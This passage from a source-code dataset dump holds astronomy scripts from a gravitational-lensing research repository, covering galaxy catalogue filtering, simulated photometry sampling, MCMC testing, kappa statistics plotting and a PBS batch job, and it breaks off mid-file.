# select desired columns\n if head1[j] == 'id': data = np.genfromtxt(root+list[i]+'.cat',usecols=[j],unpack=True,dtype='S')\n else: data = np.genfromtxt(root+list[i]+'.cat',usecols=[j],unpack=True)\n #if data.dtype == np.float64: type = 'float32'\n #else: type = data.dtype\n type = data.dtype\n if head == True:\n dict[head1[j]] = np.array(data, dtype=type)\n else:\n dict['col%s' %j] = np.array(data, dtype=type)\n del data\n dict['Flag'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n data1 = dict['id'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n data2 = dict['ALPHA_J2000'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n data3 = dict['DELTA_J2000'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n data4 = dict['MAG_r'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n data5 = dict['MAGERR_r'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n data6 = dict['Flag'][(dict['MAG_r']>0) & (dict['MAG_r']<=24) & (dict['MASK']==0) & (dict['star_flag']==0)]\n dict['id'] = data1; dict['ALPHA_J2000'] = data2; dict['DELTA_J2000'] = data3; dict['MAG_r'] = data4; dict['MAGERR_r'] = data5; dict['Flag'] = data6;\n del dict['MASK']; del dict['star_flag']\n del data1; del data2; del data3; del data4; del data5; del data6;\n t = table.Table(dict)\n del dict\n t.write(rootout+list[i]+'_r24galphot.fits', overwrite = True)\n del t\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n" }, { "alpha_fraction": 0.6958333253860474, "alphanum_fraction": 0.7145833373069763, "avg_line_length": 28, "blob_id": "61bb3fd8be12a881f836ed4a54adf2bb66e63890", "content_id": "22bb5e98bc5f23c8b7d29e9f21347057fb63f631", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 480, "license_type": "no_license", "max_line_length": 177, "num_lines": 16, "path": "/python/modeling_utilities/insertnoise.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given an image containing flux from a perfect model, as well as a value for the original (unsubtracted) sky, create an image containing pure Poisson noise, with null sky level\r\n\r\nimport numpy as np\r\nfrom astropy.io import fits\r\n\r\nmodel = \"ilens_out_model.fits\"\r\nsky = 250000\r\n\r\nimage = fits.open(model)\r\ndata = image[0].data\r\ndata = data + sky\r\nnoise = np.random.poisson(data)\r\nnoise = noise - sky\r\nimage[0].data = noise\r\n\r\nimage.writeto(model[:-5]+\"_noise.fits\",clobber=True)\r\n" }, { "alpha_fraction": 0.5726141333580017, "alphanum_fraction": 0.6366330981254578, "avg_line_length": 30.830188751220703, "blob_id": "e87d5bc32c7a5cf98451c984b7047ea76db03d9c", "content_id": "9ffd933760a97ddc22b4e8cdea5184e1399ecfb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1687, "license_type": "no_license", "max_line_length": 85, "num_lines": 53, "path": "/python/image_utilities/limmag.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Calculates limiting mag from a given region in an image\n\nfrom astropy.io import fits\nimport numpy as np\n\ndef lim_mag(image,zpt,scale,xpix,ypix):\n i=fits.open(image)\n y=i[0].data\n listx=[]\n listy=[]\n for j in range(y.shape[0]):\n for k in range(y.shape[0]):\n if ((j-xpix)*scale)**2+((k-ypix)*scale)**2<=4:\n listx=listx+[j]\n listy=listy+[k]\n list=[]\n for x in range(len(listx)):\n list=list+[y[listx[x],listy[x]]]\n lim=zpt-2.5*np.log10(5*np.sqrt(len(list))*np.std(np.asarray(list))) # 5 sigma\n print lim\n return lim\n\nzeropt = 23.57 #+ 2.5*np.log10(1020) # do I use the exposure time?\n#image =\"J1206_NIRI_nativescale_weightedmedian.fits\"\n#scale = 0.1164 # arcsec\n#image =\"J1206_NIRI_GMOSscale_weightedmedian.fits\"\n#scale = 0.1618 # arcsec\nimage =\"1016cut.fits\"\nscale = 0.052 # arcsec\n\nlimmag = np.array([])\nx = lim_mag(image,zeropt,scale,346,33)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,280,236)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,490,110)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,340,160)\nlimmag = np.append(limmag,x)\nx = lim_mag(image,zeropt,scale,480,70)\nlimmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,980,420)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,130,250)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,470,120)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,760,470)\n#limmag = np.append(limmag,x)\n#x = lim_mag(image,zeropt,scale,530,620)\n#limmag = np.append(limmag,x)\n\nprint np.median(limmag),np.std(limmag)\n" }, { "alpha_fraction": 0.6691004633903503, "alphanum_fraction": 0.7006425261497498, "avg_line_length": 44.6533317565918, "blob_id": "3433a529eac8588bdeaaacbe7d22ddcd3fd5972c", "content_id": "f3498c9b15ae1f21b48ab2ac01126e107fa1ca56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3424, "license_type": "no_license", "max_line_length": 250, "num_lines": 75, "path": "/python/modeling_utilities/mytest_emcee.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import emcee\nimport corner\nimport numpy as np\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\n\n#np.random.seed(42) # for repeatability\ntheta_true = (25, 0.5)\nxdata = 100 * np.random.random(20)\nydata = theta_true[0] + theta_true[1] * xdata\nydata = np.random.normal(ydata, 10) # add error\n\ndef log_prior(theta):\n alpha, beta, sigma = theta\n if sigma < 0:\n return -np.inf # log(0)\n #else:\n #return (-1.5 * np.log(1 + beta**2) - np.log(sigma))\n else:\n return 0.0 # flat prior\ndef log_like(theta, x, y):\n alpha, beta, sigma = theta\n y_model = alpha + beta * x\n return -0.5 * np.sum(np.log(2*np.pi*sigma**2) + (y-y_model)**2 / sigma**2)\ndef log_posterior(theta, x, y):\n return log_prior(theta) + log_like(theta,x,y)\n\nndim = 3 # number of parameters in the model\nnwalkers = 50 # number of MCMC walkers\nnburn = 1000 # \"burn-in\" to stabilize chains\nnsteps = 10000 # number of MCMC steps to take after burn-in\nstarting_guesses = np.random.rand(nwalkers, ndim)\nsampler = emcee.EnsembleSampler(nwalkers, ndim,log_posterior,args=[xdata,ydata])\n#sampler = emcee.EnsembleSampler(nwalkers, ndim,log_posterior,args=[xdata,ydata],threads = 4) # multiple processors\npos, prob, state = sampler.run_mcmc(starting_guesses, nburn)\n# plot the time laps, only for the burn-in\n\nplt.clf()\nfig, axes = plt.subplots(3, 1, sharex=True, figsize=(8, 9))\naxes[0].plot(sampler.chain[:, :, 0].T, color=\"k\", alpha=0.4)\naxes[0].yaxis.set_major_locator(MaxNLocator(5))\naxes[0].axhline(theta_true[0], color=\"#888888\", lw=2)\naxes[0].set_ylabel(\"$a$\")\naxes[1].plot(sampler.chain[:, :, 1].T, color=\"k\", alpha=0.4)\naxes[1].yaxis.set_major_locator(MaxNLocator(5))\naxes[1].axhline(theta_true[1], color=\"#888888\", lw=2)\naxes[1].set_ylabel(\"$b$\")\naxes[2].plot(np.exp(sampler.chain[:, :, 2]).T, color=\"k\", alpha=0.4)\naxes[2].yaxis.set_major_locator(MaxNLocator(5))\naxes[2].set_ylabel(\"$s$\")\naxes[2].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\nfig.show()\n#fig.savefig(\"line-time.png\")\n\nsampler.reset() # save in pos the position of the walkers at the end of the burn-in, and rerun from there\n#sampler.run_mcmc(pos, nsteps) # instead of this, I am doing as follows so I can display the progress:\nfor i, result in enumerate(sampler.sample(pos,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n if (i+1) % 100 == 0:\n print(\"{0:5.1%}\".format(float(i) / nsteps))\n\nalpha_samp = sampler.flatchain.T[0] # combines all walkers\nbeta_samp = sampler.flatchain.T[1]\nsigma_samp = sampler.flatchain.T[2]\nprint(\"Autocorrelation time:\", sampler.get_autocorr_time())\nprint \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nprint \"median, std 1: \", np.median(alpha_samp), np.std(alpha_samp)\nprint \"median, std 2: \", np.median(beta_samp), np.std(beta_samp)\nprint \"median, std 3: \", np.median(sigma_samp), np.std(sigma_samp)\nfig = corner.corner(sampler.flatchain, labels=[\"$a$\", \"$b$\", \"$s$\"],truths=[25, 0.5, 10])\nfig.show()\n\n# emcee can probe multiple minima by using different temperatures; Emcee includes a PTSampler (PT = parallel tempering) that has a method PTSampler.thermodynamic_integration_log_evidence() for performing the evidence integral after the sampler is run\n# saving progress\n# there is an ipython parallel example in the emcee code. how does that work? also, look into the loadbalance example; there is also subprocessing.py example to run on multiple computers\n" }, { "alpha_fraction": 0.5645973086357117, "alphanum_fraction": 0.6002516746520996, "avg_line_length": 57.62295150756836, "blob_id": "8b3eab234126986f876cd50e2f575ebc151ea123", "content_id": "6fee60709c01c47c9a07c42b93a29f2937aa5cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7152, "license_type": "no_license", "max_line_length": 318, "num_lines": 122, "path": "/python/catalogue_utilities/extractMillennium_Henriques.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code samples from the Millenium Simulation (MS) photometry, assuming observed CFHTLenS-like or observed lens-like uncertainties. The files it creates will be used by photozMillenium.py\n# run as: python extractMillennium_Henriques.py GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\n\nimport numpy as np\nimport sys\nimport class_Henriques2014 # this is class_Henriques2014.py\n\nilim = 22.5\nfilters = \"griz\"\nrootin = \"/lfs08/rusucs/0408/completegalcat/\"\nrootout = \"/lfs08/rusucs/0408/completegalcat/Henriques_gal_i225_sampled/\"\nfilein = str(sys.argv[1])\nfileout = rootout + filein + \"_%s.images.txt\" % filters\n\npl = np.linspace(27,63,63 - 27 + 1) # plane 27 redshift 3.06\ndata = np.empty(8)\nfor i in range(len(pl)):\n with open(\"%s%s_%d_f.images\" % (rootin,filein,pl[i]), mode = 'rb') as file:\n lower_bound = np.fromfile(file, 'f8', 2)\n upper_bound = np.fromfile(file, 'f8', 2)\n plane_angle, = np.fromfile(file, 'f8', 1)\n redshift, = np.fromfile(file, 'f8', 1)\n n_galaxies, = np.fromfile(file, 'i8', 1)\n n_cells = np.fromfile(file, 'i4', 2)\n gal_struct = class_Henriques2014.Henriques2014()\n galaxy = np.fromfile(file, gal_struct.galaxy_struct, n_galaxies)\n\n id = galaxy['galaxy_id']\n zspec = galaxy['redshift']\n pos0 = galaxy['position'][:,0]\n pos1 = galaxy['position'][:,1]\n gmag = galaxy['mag'][:,gal_struct.filter_number_for_g_band_trans]\n rmag = galaxy['mag'][:,gal_struct.filter_number_for_r_band_trans]\n imag = galaxy['mag'][:,gal_struct.filter_number_for_i_band_trans]\n zmag = galaxy['mag'][:,gal_struct.filter_number_for_z_band_trans]\n gal = np.c_[id,zspec,pos0,pos1,gmag,rmag,imag,zmag].T\n data = np.c_[data,gal]\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\ng = 4\nr = 5\ni = 6\nz = 7\ndataout = np.zeros([np.shape(data)[0]+4,np.shape(data)[1]]) # use this instead of dataout since I am modifying the content but I will still need the original content when working with multiple sets of filters\nid_o = 0\nzspec_o = 1\nposx_o = 2\nposy_o = 3\ng_o = 4\ngerr_o = 5\nr_o = 6\nrerr_o = 7\ni_o = 8\nierr_o = 9\nz_o = 10\nzerr_o = 11\n\ndataout[id_o] = np.copy(data[id])\ndataout[zspec_o] = np.copy(data[zspec])\ndataout[posx_o] = np.copy(data[posx])\ndataout[posy_o] = np.copy(data[posy])\ndataout[g_o] = np.copy(data[g])\ndataout[r_o] = np.copy(data[r])\ndataout[i_o] = np.copy(data[i])\ndataout[z_o] = np.copy(data[z])\n\n''' Sampling the photometry by assuming error bars from the observations. First assign the non-fixed error bar, then sample a new photometry point'''\nif filters == \"griz\":\n# griz (DES-like)\n file_errorbars = \"/lfs08/rusucs/code/median_errors_hlin_12Aug2019edited.txt\"\n err = np.loadtxt(file_errorbars,unpack=True)\n err_maginf = 0\n err_magsup = 1\n err_g_lnmed = 2\n err_g_lnsig = 3\n err_r_lnmed = 5\n err_r_lnsig = 6\n err_i_lnmed = 8\n err_i_lnsig = 9\n err_z_lnmed = 11\n err_z_lnsig = 12\n\n dataout[gerr_o][dataout[g_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_g_lnmed][0], err[err_g_lnsig][0], len(dataout[gerr_o][dataout[g_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_g_lnmed][j], err[err_g_lnsig][j], len(dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])]))\n dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_g_lnmed][-1], err[err_g_lnsig][-1], len(dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]]))\n\n dataout[rerr_o][dataout[r_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_r_lnmed][0], err[err_r_lnsig][0], len(dataout[rerr_o][dataout[r_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_r_lnmed][j], err[err_r_lnsig][j], len(dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])]))\n dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_r_lnmed][-1], err[err_r_lnsig][-1], len(dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]]))\n\n dataout[ierr_o][dataout[i_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_i_lnmed][0], err[err_i_lnsig][0], len(dataout[ierr_o][dataout[i_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_i_lnmed][j], err[err_i_lnsig][j], len(dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])]))\n dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_i_lnmed][-1], err[err_i_lnsig][-1], len(dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]]))\n\n dataout[zerr_o][dataout[z_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_z_lnmed][0], err[err_z_lnsig][0], len(dataout[zerr_o][dataout[z_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_z_lnmed][j], err[err_z_lnsig][j], len(dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])]))\n dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_z_lnmed][-1], err[err_z_lnsig][-1], len(dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]]))\n\n dataout[g_o] = np.random.normal(dataout[g_o], dataout[gerr_o])\n dataout[r_o] = np.random.normal(dataout[r_o], dataout[rerr_o])\n dataout[i_o] = np.random.normal(dataout[i_o], dataout[ierr_o])\n dataout[z_o] = np.random.normal(dataout[z_o], dataout[zerr_o])\n\n dataout[gerr_o][dataout[gerr_o] <= 0.01] = 0.01\n dataout[rerr_o][dataout[rerr_o] <= 0.01] = 0.01\n dataout[ierr_o][dataout[ierr_o] <= 0.01] = 0.01\n dataout[zerr_o][dataout[zerr_o] <= 0.01] = 0.01\n\n dataout = np.delete(dataout,np.where(dataout[i_o] > ilim),axis=1)\n dataout = np.delete(dataout,np.where(dataout[i_o] < 0),axis=1) # because there are some -inf in 8_7_7 and 8_3_7\n\n head = \"GalID \\t z_spec \\t pos0 \\t pos1 \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\"\n np.savetxt(fileout,np.c_[dataout[id_o],dataout[zspec_o],dataout[posx_o],dataout[posy_o],dataout[g_o],dataout[gerr_o],dataout[r_o],dataout[rerr_o],dataout[i_o],dataout[ierr_o],dataout[z_o],dataout[zerr_o]],header=head,fmt='%d \\t %.7f \\t %.7f \\t %.7f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\nprint filein + ' Done!'\n" }, { "alpha_fraction": 0.6063218116760254, "alphanum_fraction": 0.6954023241996765, "avg_line_length": 19.41176414489746, "blob_id": "e8f310c563d986dab364cfefeb29716f477b52a1", "content_id": "6ea76ca45975a11af1d2130cf579d47da18f3248", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 348, "license_type": "no_license", "max_line_length": 122, "num_lines": 17, "path": "/python/scripts/NAOJ/batch0_insertstarsnomass.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb17.out\n#PBS -e Logb17.err\n#PBS -N 17\n#PBS -l mem=4gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomasstable.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5 -1 -1\n\n" }, { "alpha_fraction": 0.48022598028182983, "alphanum_fraction": 0.6725988984107971, "avg_line_length": 55.19047546386719, "blob_id": "6419ec29230252f2e7ff527594e3e36bfa7edb0e", "content_id": "539767f0025726d2804fe8d750fea21dc2a0e97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3540, "license_type": "no_license", "max_line_length": 165, "num_lines": 63, "path": "/python/plot_utilities/kappa_medsigsim.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\n#import matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n#import scipy as sp\nfrom scipy.stats import norm\nfrom scipy.optimize import curve_fit\nimport numpy as np\nimport os\nimport glob\n\n# I used inferkappa_unbiasedwithshear45and120FITSio_customzeta.py on J1206 24 with pure number counts, zeta=0.6,0.8,1.0,1.2,1.4,1.6,1.8,2.0(,2.6)\n# with width +/-0.05 to explore the relation between kappamed and sigma:\n#medpdf_45=np.array([ -0.036,-0.025,-0.014,-0.000,0.017,0.036,0.060,0.087,0.180])\n#stdpdf_45=np.array([0.018 ,0.021,0.024,0.029,0.035,0.042,0.051,0.061,0.092])\n#medpdf_120=np.array([-0.045,-0.030,-0.012,0.009,0.034,0.064,0.097,0.118])\n#stdpdf_120=np.array([0.017,0.021,0.026,0.033,0.042,0.052,0.068,0.076])\n\n# I used inferkappa_unbiasedwithshear45and120FITSio_customzeta.py on WFI2033 22.5 with pure number counts, zeta=0.6,0.8,1.0,1.2,1.4,1.6,1.8,2.0,2.2,2.4,(2.6,3.0,3.4)\n# with width +/-0.1 and E=1 to explore the relation between kappamed and sigma:\nmedpdf_45=np.array([ -0.027,-0.022,-0.016,-0.010,-0.004,0.003,0.011,0.020,0.031,0.043,0.056,0.071,0.086,0.101,0.118,0.135,0.155,0.181,0.202,0.220])\nstdpdf_45=np.array([0.026, 0.026, 0.028, 0.031, 0.033, 0.037,0.042,0.044,0.050,0.061,0.063,0.067,0.075,0.085,0.092,0.105,0.116,0.132,0.137,0.132])\nmedpdf_120=np.array([-0.034,-0.025,-0.016,-0.005,0.006,0.020,0.036,0.054,0.074,0.094,0.118,0.139,0.159])\nstdpdf_120=np.array([0.024, 0.027, 0.032,0.035, 0.040,0.047,0.053,0.063,0.076,0.090,0.094,0.104,0.121])\n\ndef func(x, a, b):\n return a * x + b\n\npopt45, pcov45 = curve_fit(func, medpdf_45, stdpdf_45)\npopt120, pcov120 = curve_fit(func, medpdf_120, stdpdf_120)\n#plt.plot(medpdf_45, stdpdf_45, 'b-', label='data45')\n#plt.plot(medpdf_120, stdpdf_120, 'r-', label='data120')\n#plt.plot(medpdf_45, func(medpdf_45, *popt45), 'b-.',label='fit: a=%5.3f, b=%5.3f' % tuple(popt45))\n#plt.plot(medpdf_120, func(medpdf_120, *popt120), 'r-.',label='fit: a=%5.3f, b=%5.3f' % tuple(popt120))\n#plt.legend()\n#plt.show()\npopt = np.mean([popt45,popt120],axis=0)\n\n# But the way inferkappa_unbiasedwithshear45and120FITSio_customzeta.py computes std is not a simple np.std, which is output by inferkappasimbias.py\n# Normalizing std(truekappa-medkappa):\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_2/\"\n#x = np.loadtxt(root+'kappasim_WFI2033_measured_5innermask_nobeta_zgap-1.0_-1.0_45_gal_22.5_med_1.0_overdensities1.0.cat',unpack=True)\nx = np.loadtxt(root+'kappasim_WFI2033_measured_5innermask_nobeta_zgap-1.0_-1.0_45_gal_22.5_med_overdensities1.44.cat',unpack=True)\n#x = np.loadtxt(root+'kappasim_WFI2033_measured_5innermask_nobeta_zgap-1.0_-1.0_120_gal_22.5_med_overdensities1.55.cat',unpack=True)\n\nlist = glob.glob(root+'kappasim_WFI2033*.cat')\nfout = root + 'medstdbias.dat'\nos.system('rm -f %s' % fout)\n\nfor i in range(len(list)):\n file = list[i]\n data = np.loadtxt(file)\n data = data[data[:,4] >= 3] # at least 3 LOS\n data = data.T\n if np.shape(data)[1] != 0:\n scaledstd = np.std(data[1]-data[0]) * (func(np.median(x[1]), *popt)/func(np.median(data[1]), *popt)) / np.std(x[1]-x[0])\n str = \"%s %.3f %.3f %d %d %.3f \\n\" % (list[i],np.median(data[0]-data[1]),np.std(data[0]-data[1]),np.median(data[4]),len(data[0]),scaledstd)\n #str = \"%s %.3f %.3f %d %d \\n\" % (list[i],np.median(data[1]),np.std(data[0]-data[1]),np.median(data[4]),len(data[0]))\n else: str = \"%s 0.000 0.000 0 0 0.000 \\n\" % (list[i])\n file =open(fout,'a')\n file.write(str)\nfile.close()\n" }, { "alpha_fraction": 0.6288546323776245, "alphanum_fraction": 0.6921806335449219, "avg_line_length": 38.4782600402832, "blob_id": "f738188cd106eae7b43e09bb6c84d47540c1fa87", "content_id": "eec2d8756e29ada6ae7304b014438ddb88f01317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1816, "license_type": "no_license", "max_line_length": 234, "num_lines": 46, "path": "/python/plot_utilities/image.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates figure 1 from Rusu et al. 2017\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\npix = 915 # number of pixels in 4 arcmin\nscale = 240.0 / pix\nmaglim = 23\nx,y,i,classify = np.loadtxt(\"/Users/eduardrusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\",usecols=[0,1,4,97],unpack=True)\nsep = np.sqrt((x - 457.5)**2 + (y - 457.5)**2) * scale\n\nx = x[(sep <= 120) & (i <= maglim)]\ny = y[(sep <= 120) & (i <= maglim)]\nclassify = classify[(sep <= 120) & (i <= maglim)]\nsep = sep[(sep <= 120) & (i <= maglim)]\n\nx_spec = x[(classify == 0) | (classify == 1)]\ny_spec = y[(classify == 0) | (classify == 1)]\n\nx_star = x[classify < 0]\ny_star = y[classify < 0]\n\nx_galnospec = x[classify == 2]\ny_galnospec = y[classify == 2]\n\nimage = fits.getdata(\"/Users/eduardrusu/Desktop/WFI2033/WFI2033analysis/FINALweighted_ir.fits\")\nimage[image<0]=0.0001\n\nmask = fits.getdata(\"6_120arcsec.fits\")\n\nplt.scatter(x_star,y_star,marker='*',facecolors='none', edgecolors='k')\nplt.scatter(x_galnospec,y_galnospec,marker='o',facecolors='none', edgecolors='k')\nplt.scatter(x_spec,y_spec,marker='s',facecolors='none', edgecolors='k')\nplt.imshow(image, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=0.001, vmax=100)\nplt.imshow(mask, cmap='Oranges', origin='lower', alpha=0.2)\ncircle1 = plt.Circle((pix/2.0,pix/2.0),45/120.0*pix/2.0,color='k',fill=False)\ncircle2 = plt.Circle((pix/2.0,pix/2.0),pix/2.0,color='k',fill=False)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig.gca().add_artist(circle2)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('FOV_WFI2033.png', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.577051043510437, "alphanum_fraction": 0.65347820520401, "avg_line_length": 65.55363464355469, "blob_id": "1eec2b785caedec2ce77b430ea2a07532b852aef", "content_id": "697203d1e788d2e5bb812775f92f2df218381f22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19234, "license_type": "no_license", "max_line_length": 287, "num_lines": 289, "path": "/python/catalogue_utilities/groupsampling.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run this code in order to sample possible galaxies part of an incomplete spectroscopic group\n# no uncertainties assumed on group centroid because they are small enough to ignore\n# if I get error ValueError: Cannot take a larger sample than population when 'replace=False' simply run the code again or increase the faintmagspec or photoztolerance\n\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\nselectpdz = True # whether or not to actually select a number of desired samples, not just compute the theoretical distributions\nif selectpdz == True: samples = 20 # define any number of desired samples\nmode = \"poisson\"\n#mode = \"mcmc\"\nphotoztolerance = 2.5 # number of sigmas; doesn't apply to PG1115\n#lens = 'PG1115'\n#lens = 'WFI2033'\nlens = '0408'\n#zgroup = 0.6588 # WFI2033lens\n#zgroup = 0.4956 # WFI2033\nif lens == '0408': zgroup = 0.598 # 0408, Jason's group 5, including the lens\nif lens == 'PG1115': zgroup = 0.3097\nif lens == '0408' or lens == 'WFI2033' or lens == 'PG1115': limmag = 22.5 # slightly fainter than faintest in Momcheva, for PG1115\nif lens == '0408' or lens == 'WFI2033' or lens == 'PG1115': faintmagspec = 22.5 # for PG1115, slightly fainter than faintest in Momcheva\nif lens == '0408': center_lensx = '04:08:21.700'; center_lensy = '-53:53:59.40' # by eye from HST images\nif lens == 'WFI2033': center_lensx = '20:33:42.080'; center_lensy = '-47:23:43.00' # WFI2033\nif lens == 'PG1115': center_lensx = '11:18:16.90'; center_lensy = '+07:45:59.00' # PG1115\ncenter_lens = SkyCoord(center_lensx + ' ' + center_lensy, frame='fk5', unit=(u.hourangle, u.deg))\nif lens == '0408' and zgroup == 0.598:\n center_groupx = '62.0797'; center_groupy = '-53.9011'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 21.6 # converted to arcsec\n virrad = 104 # actually R_200 in arcsec\n virrad_err = 54\nif zgroup == 0.6588:\n center_groupx = '308.43557011'; center_groupy = '-47.37411275'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 26 # converted to arcsec\n virrad = 142 # actually R_200 in arcsec - from Dominique's email on Dec 3 2018\n virrad_err = 22\nif zgroup == 0.4956:\n center_groupx = '308.46337200'; center_groupy = '-47.36336725'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 60\n virrad = 164\n virrad_err = 33\nif zgroup == 0.3097:\n center_groupx = '169.5681'; center_groupy = '7.7648'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 20\n virrad = 180\n virrad_err = 36 # arbitrary 20%, as average between the ones from Dominique\n\nsep_groupx = center_lens.separation(SkyCoord(center_groupx + ' ' + center_lensy, frame='fk5', unit=(u.deg, u.deg))).arcsec\nsep_groupy = center_lens.separation(SkyCoord(center_lensx + ' ' + center_groupy, frame='fk5', unit=(u.hourangle, u.deg))).arcsec\n# arcsec # using R_200, which is robust against Dominique's and is used in the reference papers\n# Each of the 2 groups in WFI2033 have 3 galaxies outside R_200 so I should not count these\nif lens == '0408' and zgroup == 0.598: observed_members = 17\nif zgroup == 0.6588: observed_members = 16 # inside virial radius; the last column in the table from Dominique\nif zgroup == 0.4956: observed_members = 7\nif zgroup == 0.3097: observed_members = 13\nif lens == 'PG1115':\n file = '/Users/cerusu/Dropbox/Davis_work/code/PG1115/PG1115.cat'\n data = np.loadtxt(file,usecols=[2,3,4,8,11])\n othergals = 